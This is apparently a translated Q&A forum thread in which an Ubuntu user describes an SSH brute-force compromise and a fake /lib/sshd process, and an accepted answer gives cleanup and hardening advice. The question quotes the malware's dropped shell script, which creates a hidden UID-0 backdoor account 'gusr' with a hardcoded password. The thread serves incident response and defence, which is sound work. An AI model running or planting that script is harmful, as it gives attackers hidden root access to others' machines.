私のUbuntu13.10ラップトップはある種のマルウェアに感染していると確信しています。
時々、プロセス/ lib / sshd(rootが所有)が実行され、大量のCPUを消費していることに気付きます。 / usr / sbin/sshdを実行するのはsshdサーバーではありません。
バイナリには–wxrw-rwt権限があり、/libディレクトリにスクリプトを生成して生成します。最近のものは13959730401387633604という名前で、次のことを行います
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
gusrユーザーはマルウェアによって独自に作成された後、100%CPUを消費しながらchpasswdがハングします。
これまでのところ、gusrユーザーが/ etc /
内のファイルに追加されていることを確認しました。/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
マルウェアは、これらすべてのファイルのコピーに「-」サフィックスを付けたようです。 rootによって変更された/etc/ファイルの完全なリストはここにあります。
さらに、/ etc/hostsファイルがthisに変更されました。
/ lib / sshdは、/ etc / init.d / rc.localファイルの最後に自分自身を追加することから始まります!
ユーザーを削除し、ファイルを削除し、処理済みのツリーを強制終了し、パスワードを変更し、ssh公開鍵を削除しました。
私は基本的に困惑していることを認識しており、おそらくシステム全体を再インストールします。それでも、他のいくつかのマシンにログインしているので、少なくともそれを削除して、どのようにして取得したかを理解することをお勧めします。これを実行する方法についての提案をいただければ幸いです。
彼らは3月25日にブルートフォースルートログインで侵入したようです。 Ubuntuでrootsshがデフォルトで有効になっていることを知りませんでした。無効にして、拒否ホストを設定しました。
ログインは59.188.247.236からで、明らかに香港のどこかでした。
EmperorLinuxからラップトップを入手し、ルートアクセスを有効にしました。それらのいずれかがあり、sshdを実行している場合は注意してください。
承認された回答:
まず、そのマシンを今すぐネットワークから外します!
次に、rootアカウントを有効にしたのはなぜですか?非常に正当な理由がない限り、rootアカウントを有効にしないでください。
第三に、はい、あなたがクリーンであることを確認する唯一の方法は、クリーンインストールを行うことです。また、すべてがいつ開始されたかわからないため、最初からやり直してバックアップに戻らないことをお勧めします。
関連:パブリックIPを決定するためのコマンド?また、次回のインストールでファイアウォールを設定し、すべての着信接続を拒否することをお勧めします:
sudo ufw default deny incoming
次に、次のコマンドでsshを許可します:
sudo ufw allow ssh
ルートアカウントを有効にしないでください。 確かに rootsshログインが無効になっていることを確認してください。